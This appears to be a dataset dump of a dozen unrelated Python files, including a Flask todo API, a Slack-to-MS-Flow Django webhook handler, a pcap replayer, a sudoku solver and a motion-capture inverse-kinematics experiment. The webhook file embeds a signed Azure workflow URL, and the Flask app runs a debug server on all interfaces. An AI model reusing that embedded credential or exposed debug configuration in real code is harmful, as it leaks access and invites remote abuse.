index int64 0 1,000k | blob_id stringlengths 40 40 | code stringlengths 7 10.4M |
|---|---|---|
19,700 | f9f9ea100e56b446f9defdc6cd504b7ee33e108b | import sqlite3
import json
import os
import yaml
import sqlite3
from flask import Flask, g, request
from flask_restful import reqparse, abort, Api, Resource
app = Flask(__name__)
# Random per-process secret key: sessions/signing won't survive a restart.
app.secret_key = os.urandom(24)
def get_db():
    """Return the request-scoped SQLite connection, opening it on first use."""
    conn = getattr(g, '_database', None)
    if conn is not None:
        return conn
    conn = g._database = sqlite3.connect('data/app.db')
    # Row factory lets callers treat rows as dict-like objects.
    conn.row_factory = sqlite3.Row
    return conn
def db_query(query, args=(), one=False):
    """Run a SELECT; return all rows, or the first row (None if empty) when one=True."""
    cursor = get_db().execute(query, args)
    rows = cursor.fetchall()
    cursor.close()
    if one:
        return rows[0] if rows else None
    return rows
def db_execute(query: str, args: tuple = ()) -> int:
    """Execute a write statement, commit, and return the last inserted rowid.

    The original annotated every parameter and the return as `object`,
    which conveys nothing; the real contract is (str, sequence) -> rowid.
    """
    cur = get_db().execute(query, args)
    get_db().commit()
    lastid = cur.lastrowid
    cur.close()
    return lastid
@app.teardown_appcontext
def close_connection(exception):
    """Tear-down hook: close the per-request SQLite connection if one was opened."""
    conn = getattr(g, '_database', None)
    if conn is not None:
        conn.close()
# Setup Restful API Support
api = Api(app)
@app.after_request
def after_request(response):
    """Attach permissive CORS headers to every outgoing response."""
    cors_headers = {
        'Access-Control-Allow-Origin': '*',
        'Access-Control-Allow-Headers': 'Content-Type,Authorization',
        'Access-Control-Allow-Methods': 'GET,PATCH,PUT,POST,DELETE',
    }
    for name, value in cors_headers.items():
        response.headers.add(name, value)
    return response
# Request parser shared by the resource endpoints.
parser = reqparse.RequestParser()
for arg_name in ('task', 'id', 'method'):
    parser.add_argument(arg_name)
# Todo
# shows a single todo item and lets you delete a todo item
# Todo
# shows a single todo item and lets you delete a todo item
class Task(Resource):
    """REST resource for one todo item: fetch, delete, or update by id."""

    # Columns a client may set via PATCH. Interpolating arbitrary body keys
    # into the SET clause (as the original did) is an SQL-injection vector.
    _PATCH_COLUMNS = ('title', 'description', 'active', 'complete')

    def get(self, id):
        """Return the todo row with the given id, or a 404 payload if absent."""
        message = "record returned successfully"
        status = 200
        success = True
        # Fixed: parameters must be a sequence -- (id,) not (id). The bare
        # parenthesized string only worked by accident for one-character ids.
        row = db_query('SELECT * FROM todo WHERE id = ?', (id,), one=True)
        if row is None:
            payload = []
            message = 'no matching record found'
            status = 404
            success = False
        else:
            payload = [dict(row)]
        return {
            'success': success,
            'status': status,
            'message': message,
            'payload': payload,
        }

    def delete(self, id):
        """Delete the todo row with the given id."""
        db_execute('DELETE FROM todo WHERE id = ?', (id,))
        return {
            'success': True,
            'status': 200,
            'message': 'task removed successfully',
            'payload': [],
        }, 201

    def patch(self, id):
        """Update whitelisted columns from the JSON body; return the updated row.

        Fixed vs. original: bound parameters are collected in the same pass
        that builds the SET clause (the original always bound title,
        description, active, complete in fixed order regardless of which keys
        the body actually contained), unknown columns are rejected, and the
        response message is the success text rather than the debug SET clause.
        """
        body = request.get_json()
        assignments = []
        params = []
        for key, value in body.items():
            if key == 'id':
                continue
            if key not in self._PATCH_COLUMNS:
                abort(400, message="unknown column: {0}".format(key))
            assignments.append('{0} = ?'.format(key))
            params.append(value)
        params.append(id)
        query = 'UPDATE todo SET {0} WHERE id = ?'.format(", ".join(assignments))
        db_execute(query, tuple(params))
        row = db_query('SELECT * FROM todo WHERE id = ?', (id,), one=True)
        return {
            'success': True,
            'status': 200,
            'message': 'task updated successfully',
            'payload': [dict(row)],
        }, 201
# TodoList
# shows a list of all todos, and lets you POST to add new tasks
class TaskList(Resource):
    """REST resource for the todo collection: list all tasks or create one."""

    def get(self):
        """Return every todo row."""
        todos = [dict(row) for row in db_query('SELECT * FROM todo')]
        return {
            'success': True,
            'status': 200,
            'message': "{} records returned successfully".format(len(todos)),
            'payload': {'tasks': todos},
        }

    def post(self):
        """Create a todo from the JSON body's 'task' object; return the new row."""
        task = request.get_json()['task']
        # Renamed local: the original shadowed the builtin `id`.
        new_id = db_execute(
            'INSERT INTO todo (title, description, complete) VALUES (?, ?, ?)',
            (task['title'], task['description'], task['complete']))
        row = db_query('SELECT * FROM todo WHERE id = ?', (new_id,), one=True)
        return {
            'success': True,
            'status': 200,
            'message': 'task created successfully',
            'payload': [dict(row)],
        }, 201
##
## Actually setup the Api resource routing here
##
# Collection route and single-item route (id is captured as a string).
api.add_resource(TaskList, '/tasks')
api.add_resource(Task, '/tasks/<id>')
@app.route('/')
def home():
    """Catch-all root route: the API itself lives under /tasks."""
    return ("Please use a valid route", 404)
# Run the development server when executed directly (listens on all interfaces).
if __name__ == '__main__':
    app.run(
        debug=True,  # NOTE(review): debug mode must be disabled in production
        host='0.0.0.0'
    )
19,701 | 6b8ee730c02cc837eaae91312ee8697bc6357cf7 |
from lookahead_agent import LookaheadAgent
import random
class OneStepLookaheadAgent(LookaheadAgent):
    """Agent that scores each candidate move by looking one ply ahead.

    The original override of __init__ only forwarded to super() with the same
    signature; it was redundant and has been removed -- the inherited
    LookaheadAgent.__init__(config) behaves identically.
    """

    def name(self):
        """Human-readable agent name."""
        return "One step lookahead"

    # Calculates score if agent drops piece in selected column
    def score_move(self, grid, col):
        """Return the heuristic value of the grid after dropping our piece in col."""
        next_grid = self.drop_piece(grid, col, self.piece)
        return self.get_heuristic(next_grid, self.piece)
|
import argparse
import math
import time
from keras.models import model_from_json
import json
import numpy as np
import time

# Load the network architecture from JSON and its trained weights from HDF5.
# Location Of JSON file
json_file = open('bot.json', 'r')
# json_file = open('pkmkb(70).json', 'r')
loaded_model_json = json_file.read()
json_file.close()
loaded_model = model_from_json(loaded_model_json)
# load weights into new model
# Write the file name of the weights
# loaded_model.load_weights("pkmkb(70)_weights.h5")
loaded_model.load_weights("model-250-0.798153-0.802632.h5")
# Pre-builds the predict graph so predict() can be called from the OSC server
# thread. NOTE(review): _make_predict_function() is a private TF1-era Keras
# API removed in later versions -- this pins an old Keras.
loaded_model._make_predict_function()
print("Loaded model from disk")

from pythonosc import dispatcher
from pythonosc import osc_server

'''
TP9, AF7, AF8, TP10'''
def eeg_handler(unused_addr, args, ch1, ch2, ch3, ch4, ch5):
    """OSC callback: classify one 4-channel EEG sample and print the direction.

    Only the first four channels are fed to the network; ch5 is ignored.
    """
    print('yes')
    sample = np.array([ch1, ch2, ch3, ch4], 'float64').reshape(1, 4, 1)
    print("@@@@@@@@@@")
    prediction = loaded_model.predict(sample)
    print("********")
    scores = list(prediction[0])
    winner = scores.index(max(scores))
    if winner == 0:
        print("Forward")
        # client.publish(mqtt_topic1, "F")
    elif winner == 1:
        print("Backward")
        # client.publish(mqtt_topic1, "B")
    elif winner == 2:
        print("Left")
        # client.publish(mqtt_topic1, "L")
    elif winner == 3:
        print("Right")
        # client.publish(mqtt_topic1, "R")
# Bind the EEG handler to the /muse/eeg OSC address and serve UDP forever.
ip = "192.168.0.124"
port = 5005

dispatcher = dispatcher.Dispatcher()  # NOTE: rebinds the imported module name
dispatcher.map("/muse/eeg", eeg_handler, "EEG")

server = osc_server.ThreadingOSCUDPServer(
    (ip, port), dispatcher)
# print("Serving on {}".format(server.server_address))
server.serve_forever()
|
19,703 | d495655ea5ad9c8cce2bbbfa648ef4b156cd21d0 | from django.http.response import JsonResponse as JSR
from django.http.response import HttpResponse
from django.views.decorators.csrf import csrf_exempt
from django.conf import settings
import requests
import json
from portal.models import notify_devs
MS_FLOW_URL="https://prod-54.westus.logic.azure.com:443/workflows/306a0803a4ee49fc939bb1a1a7467829/triggers/manual/paths/invoke?api-version=2016-06-01&sp=%2Ftriggers%2Fmanual%2Frun&sv=1.0&sig=LPDDdoYWwIkmlKVdgu_0PPOa5cMPHFzm8GOOyqqiSn8"
@csrf_exempt
def dispatch(request):
    """Entry point: notify Slack that the room named in the POST body is ready."""
    form = request.POST
    notify_devs("info", "body is: {}\nrequest.POST is: {}".format(form, request.POST))
    room_notify(room=form["room"])
    return HttpResponse(content=None)
@csrf_exempt
def respond(request):
    """Slack callback endpoint.

    Handles two shapes of POST:
    - URL-verification handshake: echoes back the 'challenge' value.
    - Interactive button press: relays the result to Slack and an MS Flow
      webhook, then reports the outcome to the devs channel.
    """
    body = request.POST
    notify_devs("primary", body)
    if 'challenge' in body:
        # Slack URL verification: respond with the challenge token as JSON.
        challenge_val = body['challenge']
        notify_devs('warning', 'body is: {} and challenge is: {}'.format(str(body), challenge_val))
        return HttpResponse(content=json.dumps({'challenge':challenge_val}), content_type='application/json')
    elif 'payload' in body:
        # Interactive action: the payload arrives as a JSON string.
        payload = json.loads(body['payload'])
        # channel = payload["channel"]["id"]
        response_url = payload["response_url"]
        responding_user_id = payload["user"]["id"]
        responding_user = payload["user"]
        # Button value encodes "<room>|<status>" (see room_notify below).
        reaction = payload["actions"][0]["value"]
        reaction_results = reaction.split("|")
        room = reaction_results[0]
        status = reaction_results[1]
        notify_devs("success", "reaction received from {}: {}".format(responding_user, reaction_results))
        # send reaction to slack
        r1 = requests.post(response_url, data=json.dumps({"replace_original":"true","text":"<@{}> marked {} as {}.".format(
            responding_user_id, room, status)}),headers={"Content-type":"application/json"})
        # send update to MS Flow to update spreadsheet.
        # NOTE(review): 'userid' is sent the whole user dict, not the id --
        # confirm the Flow endpoint actually expects that.
        ms_flow_data = {"room":room, "result":status, "userid":responding_user}
        r2 = requests.post(MS_FLOW_URL, data=json.dumps(ms_flow_data), headers={"Content-type": "application/json"})
        # update message in Slack with MS Flow response
        r3 = requests.post(response_url, data=json.dumps({"ephemeral": "true", "text": "{}".format(r2.status_code)}),
                           headers={"Content-type": "application/json"})
        notify_devs("danger","process finished\n{}-{}\n{}-{}".format(r2.status_code, r2.text, r3.status_code, r3.text))
    return HttpResponse(content=None)
def send_to_slack(content, channel="GBWTZANG6", url="https://slack.com/api/chat.postMessage"):
    """POST a Slack Block Kit payload to the given channel; return the Response.

    Security fix: the original `print(settings.SLACK_API_TOKEN)` leaked the
    bot credential into server logs on every call and has been removed.
    """
    payload = json.dumps({"channel": channel, "blocks": content})
    headers = {"Content-type":"application/json", "Authorization": "Bearer {}".format(settings.SLACK_API_TOKEN)}
    return requests.post(url, data=payload, headers=headers)
def room_notify(room="Acacia-101", channel="GBWTZANG6"):
    """Post an interactive "room ready for inspection" message to Slack."""

    def button(label, style, verdict):
        # One action button; its value encodes "<room>|<verdict>" for respond().
        return {
            "type": "button",
            "text": {
                "type": "plain_text",
                "emoji": True,
                "text": label,
            },
            "style": style,
            "value": "{}|{}".format(room, verdict),
        }

    blocks = [
        {
            "type": "section",
            "text": {
                "type": "mrkdwn",
                "text": "{} is empty and ready for inspection.".format(room),
            },
        },
        {
            "type": "actions",
            "elements": [
                button(":white_check_mark: Good to go!", "primary", "good"),
                button(":x: Has a problem!", "danger", "bad"),
            ],
        },
    ]
    send_to_slack(blocks, channel)
def respond_to_slack_interaction(request):
    """Parse the raw request body as JSON.

    NOTE(review): the parsed body is never used or returned (the function
    implicitly returns None) -- this looks unfinished; confirm intent.
    """
    try:
        body = json.loads(request.body)
    except TypeError:
        # request.body may arrive as bytes; decode to str before parsing.
        body = json.loads(str((request.body.decode('utf-8'))))
|
class Employee:
    """Toy class demonstrating class vs. instance attributes.

    'companay' is a typo for 'company', kept as-is because the statements
    below read the attribute by that name.
    """
    companay = "google"  # class attribute, shared until shadowed per-instance
    salary = 100         # default salary; the script below overrides it per-instance
# Two instances share the class attributes until they shadow them.
harry = Employee()
rajni = Employee()
# Assigning through an instance creates per-instance 'salary' attributes.
harry.salary = 300
rajni.salary = 400
print(harry.companay)  # "google" -- attribute lookup falls back to the class
print(rajni.companay)
# Rebinding the class attribute is visible through both instances...
Employee.companay = "YouTube"
print(harry.companay)
print(rajni.companay)
# ...but the shadowed per-instance salaries win over the class default.
print(harry.salary)
print(rajni.salary)
|
19,705 | 7b8066ee223be671af43fef682bac32ba199dd1e | #!/usr/bin/env python3
# coding: utf-8
import argparse

parser = argparse.ArgumentParser(description='freq autochord prediction.')
parser.add_argument('--ntest', metavar='N', type=int, default=2000,
                    help='test set size')
parser.add_argument('state_filename', metavar='freq_perfect.state', type=str, default="freq_perfect.state",
                    help='input state filename')


def _str2bool(text):
    """Parse a CLI boolean string.

    Fixed: the original used type=bool, for which ANY non-empty string --
    including '--batch False' -- parsed as True. This keeps the
    '--batch <value>' interface but interprets the value correctly.
    """
    return text.strip().lower() in ('1', 'true', 'yes', 'y', 'on')


parser.add_argument('--batch', type=_str2bool, default=False,
                    help='batch mode')
args = parser.parse_args()
print(args)
import torch
import model

# Restore the trained network and its metadata from the saved state dict.
state = torch.load(args.state_filename)
net = model.Net(state['nsample'], state['nclass_out'])
net.load_state_dict(state['net_state_dict'])
freqs = state['freqs']
nclass_out = state['nclass_out']
nsample = state['nsample']

import data
import numpy as np

# For each training frequency, classify args.ntest synthetic series and build
# a confusion matrix: row = true frequency index, column = predicted class,
# entries in percent.
corr = []
for index, freq in enumerate(freqs):
    print("#", index, freq, end=' ')
    accum = torch.zeros(nclass_out)
    for kk in range(args.ntest):
        # Shape the 1-D series as (batch=1, channel=1, nsample) for the net.
        tensor = torch.from_numpy(data.serie(nsample, freq)).type(torch.float).unsqueeze(0).unsqueeze(1)
        prediction = net(tensor)
        # print(tensor.shape, prediction.shape, prediction.min())
        confidence, index_ = prediction.max(1)
        accum[index_] += 1
    accum = 100*accum/args.ntest
    corr.append(accum)
    print(accum)

# "Perfect" means the confusion matrix equals 100 * identity.
corr = torch.stack(corr).type(torch.int).numpy()
perfect = np.all(corr == 100 * np.eye(corr.shape[0], corr.shape[1], dtype=int))
print(corr, corr.shape)
print("PERFECT !!!!!!" if perfect else ":(")
|
import sys

# Contest-style I/O: redirect stdin so input() reads the puzzle from input.txt.
sys.stdin = open('input.txt', 'r')
def DFS(i, count):
    """Solve the sudoku by depth-first backtracking over the blank cells.

    i     -- index into zeroidx of the next blank cell to fill
    count -- number of blanks filled so far

    Prints the first solution found and sets the global `anw` flag so the
    recursion unwinds. The original kept a `visited2` list that was written
    but never read -- dead bookkeeping, removed.
    """
    global anw
    if count == len(zeroidx):
        # All blanks filled: print the solved grid and flag completion.
        for row in arr:
            print(*row)
        anw = True
        return
    nowy, nowx = zeroidx[i]
    candidate = getNum(nowy, nowx)
    if not candidate:
        return  # dead end: no legal digit fits this cell
    for digit in candidate:
        arr[nowy][nowx] = digit
        DFS(i + 1, count + 1)
        arr[nowy][nowx] = 0  # undo the placement for backtracking
        if anw:
            break
def getNum(nowy, nowx):
visited = [False for _ in range(10)]
#가로 세로
for y in range(9):
for x in range(9):
if arr[nowy][x]:
visited[arr[nowy][x]] = True
if arr[y][nowx]:
visited[arr[y][nowx]] = True
#어느 박스에 속했는지 찾기
boxy = boxx = 0
for y in [3,6,9]:
if nowy<y: boxy = y-3 ; break
for x in [3,6,9]:
if nowx<x: boxx = x-3 ; break
for j in range(3):
for i in range(3):
if arr[boxy+j][boxx+i]:
visited[arr[boxy+j][boxx+i]] = True
candidate = []
for tt in range(1,10):
if not visited[tt]:
candidate.append(tt)
return candidate
# Read the 9x9 grid (0 = blank), record blank coordinates, then solve.
arr = [list(map(int, input().split())) for _ in range(9)]
zeroidx = []
anw = False
for y in range(9):
    for x in range(9):
        if arr[y][x] == 0:
            zeroidx.append([y, x])
DFS(0, 0)
|
import json
from flask import Flask
import weather

# print(" >>> ", sys.path)
app = Flask(__name__)

# First route, served from the site root because of "/"
@app.route("/")
def hello():
    """Simple liveness check at the site root."""
    return "Hello, World!"
# Second route: current weather for Cluj, exposed at /weather-cluj/
@app.route("/weather-cluj/")
def weather_route():
    """Return the weather payload serialized as a JSON string."""
    return json.dumps(weather.weather())
# Third route: placeholder multi-city summary.
@app.route("/weather/my-cities/")
def weather_multiple_citites():
    """Hard-coded multi-city weather placeholder."""
    return "Cluj:15, New York: 10"
|
19,708 | 3d27b5b26eded65dda6c72a33302339111f098d1 | #!/usr/bin/env python
import argparse
import pcapfile.savefile
import socket
import time
def _packet_ts(packet):
return packet.timestamp + 1e-6 * packet.timestamp_ms
def main(argv):
    """Replay pcap files onto a raw AF_PACKET socket, pacing by capture times.

    --Kt scales replay speed (2.0 replays twice as fast). Requires Linux and
    CAP_NET_RAW/root for the raw socket.

    Fixes vs. original: pcap files are binary, so they are opened in 'rb'
    (text-mode 'r' corrupts reads on Windows and fails under Python 3), and
    the py2-only print statements became py2/py3-compatible print calls.
    """
    ap = argparse.ArgumentParser()
    ap.add_argument('pcap', nargs='+', help="Path to pcap file(s)")
    ap.add_argument('--itf', default='eth0', help="Interface to replay on.")
    ap.add_argument('--Kt', type=float, default=1.0,
                    help="Time factor (higher is faster).")
    args = ap.parse_args(argv)
    sock = socket.socket(socket.AF_PACKET, socket.SOCK_RAW)
    for pcap_path in args.pcap:
        with open(pcap_path, 'rb') as pcap_file:
            print("Loading %s..." % pcap_path)
            pcap = pcapfile.savefile.load_savefile(pcap_file)
            n = len(pcap.packets)
            t = _packet_ts(pcap.packets[-1]) - _packet_ts(pcap.packets[0])
            print("Replaying %d packets during %f seconds..." % (n, t))
            t0_pcap = _packet_ts(pcap.packets[0])
            t0_sys = time.time()
            for packet in pcap.packets:
                # Map the packet's capture-relative time onto wall-clock time.
                t_send_pcap = _packet_ts(packet)
                t_send_pcap_rel = t_send_pcap - t0_pcap
                t_send_sys_rel = t_send_pcap_rel / args.Kt
                t_send_sys = t_send_sys_rel + t0_sys
                # Sleep in a loop: time.sleep can wake early.
                while True:
                    delay = t_send_sys - time.time()
                    if delay <= 0:
                        break
                    time.sleep(delay)
                sock.sendto(packet.raw(), (args.itf, 0, 0))
# Script entry point: forward CLI args (minus the program name) to main().
if __name__ == '__main__':
    import sys
    main(sys.argv[1:])
|
19,709 | e20ba90f234f0d922f7808fe4478bc13b5b31d7b | # bitwise opeators on images
import cv2
import numpy as np
from matplotlib import pyplot as plt

# Demo of OpenCV bitwise operators: two black canvases, each with a filled
# white rectangle, combined pixel-wise and shown in a matplotlib grid.
img1 = np.zeros((250, 500, 3), np.uint8)  # array shape is (rows=y, cols=x, channels)
img1 = cv2.rectangle(img1, (200, 0), (300, 100), (255, 255, 255), -1)  # corners are (x, y); -1 = filled
img2 = np.zeros((250, 500, 3), np.uint8)
img2 = cv2.rectangle(img2, (250, 0), (500, 250), (255, 255, 255), -1)

# Pixel-wise combinations of the two masks.
bitAnd = cv2.bitwise_and(img2, img1)
bitOr = cv2.bitwise_or(img2, img1)
bitXor = cv2.bitwise_xor(img2, img1)
bitNot = cv2.bitwise_not(img2)

images = [img1, img2, bitAnd, bitOr, bitXor, bitNot]
titles = ['img1', 'img2', 'bitAnd', 'bitOr', 'birXor', 'bitNot']
for i in range(6):
    plt.subplot(2, 4, i + 1), plt.imshow(images[i], 'gray')
    plt.title(titles[i])
    plt.xticks([]), plt.yticks([])  # hide axis ticks

# cv2.imshow equivalents kept for reference:
# cv2.imshow('img1',img1)
# cv2.imshow('img2',img2)
# cv2.imshow('bitAnd',bitAnd)
# cv2.imshow('bitor',bitOr)
# cv2.imshow('bitXor',bitXor)
# cv2.imshow('bitNot',bitNot)
plt.show()
# cv2.waitKey(0)
# cv2.destroyAllWindows()
|
19,710 | 4acb2d0eff471f7bb5479ce5df80b50fbb335fc6 | # -*- coding: utf-8 -*-
"""
Created on Fri May 14 11:25:20 2021
@author: malth
"""
import AMCParsermaster.amc_parser_pytorch as amc
import torch
import os

# Allow duplicate OpenMP runtimes (common torch-on-Windows workaround).
os.environ["KMP_DUPLICATE_LIB_OK"] = "TRUE"

import glob
import pickle

from priors import noRoot_gauss, noRoot_NF, zeroPrior
from invKin import invKin

# hyperparametre -- experiment hyper-parameters
sigma = 1                  # noise scale passed to invKin
K = 7                      # K parameter for the NF prior (see noRoot_NF)
NF_training_nitts = 1      # normalizing-flow training iterations
invKin_nitts = 1           # inverse-kinematics optimization iterations
learning_rate = 0.1        # step size for invKin
saveRootPath = "experiment2/run5"
drawImages = False         # if True, poses are rendered via joints["root"].draw()
flowtype = "MAF"           # flow architecture name passed to noRoot_NF
device = torch.device('cuda' if torch.cuda.is_available() else 'cpu')
def Experiment_2(prior, inputPose, goal_pos, endPose, joints, jointType, saveRootPath, movementType, priorType, indeks):
    """
    :param prior: the prior used (object)
    :param inputPose: the input pose taken from test data (dict)
    :param target_positions: the position of the end effector in Cartesian coordinates (list of 3x1 tensors)
    :param endPose: the end pose taken from test data (dict)
    :param joints: list of joints objects (list)
    :param jointType: the end effector being used (as list with just one strings)
    :param saveRootPath: the root path where pickles are saved (as string)
    :param movementType: The activity used (as string)
    :param priorType: the type of prior used (as string)
    :param indeks: the index of test file for which the end pose was taken (as int)
    :return: None
    : saves the input pose from data, the generated pose and the end pose from data
    """
    print("-----------------Initial pose------------------------")
    print("jointType = ", jointType)
    if drawImages:
        joints["root"].set_motion(inputPose)
        joints["root"].draw()
    # Save the unmodified start pose for later comparison.
    saveMotion(inputPose, os.path.join(saveRootPath, "startpose"),
               movementType + "_" + str(jointType[0]) + "_" + str(indeks) + ".pkl")
    # Optimize joint angles toward goal_pos under the given prior.
    outputPose = invKin(prior, inputPose, goal_pos, jointType, joints, lr=learning_rate, sigma=sigma,
                        nitts=invKin_nitts, verbose=False)
    print("----------------Optimized pose -----------------------")
    print("jointType = ", jointType)
    if drawImages:
        joints["root"].set_motion(outputPose)
        joints["root"].draw()
    saveMotion(outputPose, os.path.join(saveRootPath, priorType),
               movementType + "_" + str(jointType[0]) + "_" + str(indeks) + ".pkl")
    print("----------------End pose (from data) -----------------------")
    print("jointType = ", jointType)
    if drawImages:
        joints["root"].set_motion(endPose)
        joints["root"].draw()
    # Ground-truth end pose from the mocap data ("rigtig" is Danish for "correct").
    saveMotion(endPose, os.path.join(saveRootPath, "rigtig"),
               movementType + "_" + str(jointType[0]) + "_" + str(indeks) + ".pkl")
def copyDict(dicct):
    """Clone a joint-angle dict: each tensor value is detached and copied."""
    return {key: value.detach().clone() for key, value in dicct.items()}
def getPose(test_amc_path, indeks):
    """Load frame `indeks` from an AMC file as an optimizable start pose.

    :param test_amc_path: path to test amc file (as string)
    :param indeks: index for which a pose is wished retrieved (as int)
    :return: The pose of the test_amc file at that index, with the root
             translation zeroed and every non-root tensor on `device` with
             requires_grad enabled.

    Fixed: tensors are moved to `device` *before* requires_grad is set.
    The original set requires_grad first; .to(device) on a CPU leaf that
    already requires grad returns a non-leaf copy on CUDA whose .grad is
    never populated, silently breaking the downstream optimization.
    """
    motions = amc.parse_amc(test_amc_path)
    motions[indeks]['root'][:3] = torch.tensor([0.0, 0.0, 0.0], device=device)
    start_pose = copyDict(motions[indeks])
    for key in start_pose:
        if key != "root":
            start_pose[key] = start_pose[key].to(device)
            start_pose[key].requires_grad = True
    return start_pose
def getGoalposes(test_amc_path, test_asf_path, jointType, indekser):
    """
    :param test_amc_path: path to test amc file
    :param test_asf_path: path to test asf file
    :param jointType: the end effector (as list of strings)
    :param indekser: indices (list of ints)
    :return: Retreiving the end effector target position of the test_amc_path relating to
    specified indices, relating to the specified end effectors. The returned data type
    is list in list. Has to be index as goal_pos_list[jointType][index]. Also returns the
    endPose
    """
    joints = amc.parse_asf(test_asf_path)
    motions = amc.parse_amc(test_amc_path)
    # Zero the global root translation so poses are position-independent.
    for motion in motions:
        motion['root'][:3] = torch.tensor([0.0, 0.0, 0.0], device=device)
    goal_pos_list = []
    goal_pos_temp = []
    print("Creating goal positions:")
    for joint in jointType:
        for indeks in indekser:
            # Forward kinematics: joint angles -> Cartesian end-effector position.
            goal_pos = amc.angle2pos(motions[indeks], joints, joint).detach()
            goal_pos_temp.append(goal_pos)
        goal_pos_list.append(goal_pos_temp)
        goal_pos_temp = []
    endPoses = [motions[indeks] for indeks in indekser]
    return goal_pos_list, endPoses
def saveMotion(motion, path, fileName):
    """Pickle a joint-angle dict to path/fileName, detaching tensors to CPU.

    :param motion: dict mapping joint name -> tensor
    :param path: destination directory (created if missing)
    :param fileName: pickle file name
    :return: None

    Fixed: directory creation uses os.makedirs(..., exist_ok=True) instead
    of the original racy isdir()-then-makedirs() sequence.
    """
    motionClone = {key: tensor.clone().detach().cpu()
                   for key, tensor in motion.items()}
    os.makedirs(path, exist_ok=True)
    with open(os.path.join(path, fileName), "wb") as f:
        pickle.dump(motionClone, f)
def getPrior(priorType, train_path):
    """
    :param priorType: The type of prior (as string): "NF", "Gauss" or "zero"
    :param train_path: The train_paths (list of training files)
    :return: A trained prior object
    :raises NotImplementedError: for an unknown priorType
    """
    frameslist = amc.getFrameslist(train_path)
    if priorType == "NF":
        prior = noRoot_NF(frameslist, flowtype=flowtype, K=K,
                          nitts=NF_training_nitts)
    elif priorType == "Gauss":
        prior = noRoot_gauss(frameslist)
    elif priorType == "zero":
        prior = zeroPrior()
    else:
        raise NotImplementedError("this prior type no exist")
    # Training frames can be large; free them eagerly before returning.
    del frameslist
    return prior
def changePathstyle(paths):
    """Normalize Windows path separators.

    :param paths: List of paths with \\'s
    :return: new list of paths with only /'s

    Rewritten as a comprehension; the original manual append loop was the
    idiomatic-comprehension case (ruff PERF401).
    """
    return [path.replace("\\", "/") for path in paths]
if __name__ == "__main__":
    device = torch.device('cuda' if torch.cuda.is_available() else 'cpu')
    priorTypes = ["NF", "Gauss", "zero"]
    # (start, end) frame-index pairs per movement and end effector.
    indekser = {"walking": {"rhand": [(5, 25), (45, 65)], "lfoot": [(25, 45), (75, 95)]},
                "running": {"rhand": [(5, 25), (45, 65)], "lfoot": [(35, 55), (55, 75)]},
                "boxing": {"rhand": [(50, 70), (125, 145)], "lfoot": [(90, 110), (280, 300)]}
                }
    jointTyper = ["rhand", "lfoot"]
    # "bevægelser" is Danish for "movements" (the activities to test).
    bevægelser = ["walking", "running", "boxing"]
    # Per movement: (training-file glob, held-out test AMC file, skeleton ASF).
    dataPaths = {"walking": (glob.glob('../data/Walking/*.amc'), "../data/Walking/16_30.amc",
                             '../data/Walking/35.asf'),
                 "running": (glob.glob('../data/Running/*.amc'), "../data/Running/16_49.amc",
                             '../data/Running/16.asf'),
                 "boxing": (glob.glob('../data/Boxing/*.amc'), "../data/Boxing/13_18.amc",
                            '../data/Boxing/14.asf')}
    for bevægelse in bevægelser:
        dataPaths_train, dataPath_test, asf_path = dataPaths[bevægelse]
        dataPaths_train = changePathstyle(dataPaths_train)
        # Hold the test file out of the training set.
        dataPaths_train.remove(dataPath_test)
        joints = amc.parse_asf(asf_path)
        for priorType in priorTypes:
            prior = getPrior(priorType, dataPaths_train)
            for jointType in jointTyper:
                for startIndeks, slutIndeks in indekser[bevægelse][jointType]:
                    startpose = getPose(dataPath_test, startIndeks)
                    goal_poses, endPoses = getGoalposes(dataPath_test, asf_path, [jointType], [slutIndeks])
                    Experiment_2(prior, startpose, goal_poses[0], endPoses[0], joints,
                                 [jointType], saveRootPath, bevægelse, priorType, slutIndeks)
|
19,711 | a0f2b0517fdb02f4077d3dde275ead9dfb3dba75 | #python project
#mehraan kiya
#roshanamooz
import tkinter as tk
from docx2pdf import convert
import tkinter.ttk as ttk
from tkinter.filedialog import askopenfile
from tkinter.messagebox import showinfo
# librarys for needs (GUI toolkit + converter imported above)
win = tk.Tk()
# Window title: program name / author credit.
win.title("word to pdf converter coded by m3hr44n")
def openFile():
    """Ask the user for a .docx file and convert it to PDF.

    Fixed: askopenfile returns None when the dialog is cancelled; the
    original then crashed with AttributeError on `file.name`.
    """
    file = askopenfile(filetypes=[('word files', '*.docx')])
    if file is None:
        return  # user cancelled the dialog
    # NOTE(review): output path is hard-coded and lacks a username segment --
    # confirm the intended destination on the target machine.
    convert(file.name, r'C:\Users\Desktop\converted.pdf')
    showinfo("Done", "file successfully converted")
# label grid for size screen program
label = tk.Label(win, text="Choose file => : ")
# Fixed: grid() takes 'column', not 'columns' -- Tk resolved the original
# '-columns' as an abbreviation of '-columnspan', leaving the label in
# column 0 while the button sat in column 1.
label.grid(row=1, column=1, padx=5, pady=5)

button = ttk.Button(win, text="Select", width=30, command=openFile)
button.grid(row=2, column=1, padx=5, pady=5)

win.mainloop()
|
19,712 | 1f0357f78fec40080870dcbef46438b94de7c5bb | '''
Created on 15.12.2016
@author: sapejura
'''
import socket
# from xevacam import utils
import requests
def init(addr):
    """POST /init to the camera server and report whether it is STOPPED."""
    print('INIT')
    response = requests.post(addr + "/init", timeout=5)
    print(response.status_code, response.reason)
    print(response.text)
    status = response.json()['status']
    if status != 'STOPPED':
        print('status is not STOPPED, it\'s %s' % status)
        return
def start(addr):
    """POST /start; return the parsed JSON response on HTTP 200 OK, else None.

    Fixed: the original compared `r.status_code is 200`, an identity check
    that only works because CPython caches small ints; it is the wrong
    operator and a SyntaxWarning on Python 3.8+. Replaced with ==.
    """
    print('START')
    r = requests.post(addr + "/start", timeout=5)
    print(r.status_code, r.reason)
    print(r.text)
    if r.status_code == 200 and r.reason == 'OK':
        return r.json()
    else:
        return None
def receive_data(addr_tuple):
    """Connect to the camera's TCP stream and read 163840-byte frames forever.

    NOTE(review): the frame size 163840 is assumed to match the camera's
    frame byte count -- confirm against the server side.
    """
    print('CONNECTING TO SOCKET %s:%s' % tuple(addr_tuple))
    client_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    client_socket.connect(tuple(addr_tuple))
    # File-like wrapper: .read(n) blocks until n bytes (a full frame) arrive.
    cs = client_socket.makefile(mode='rb')
    print('CONNECTED')
    try:
        # Make a file-like object out of the connection
        # connection = client_socket.makefile('rb')
        # input('Enter')
        i = 0
        while True:
            # data = connection.read(163840)
            # data = client_socket.recv(1024)
            data = cs.read(163840)
            if data != b'':
                # print(data)
                print('Got', len(data), 'bytes frame data,', i)
                i += 1
            else:
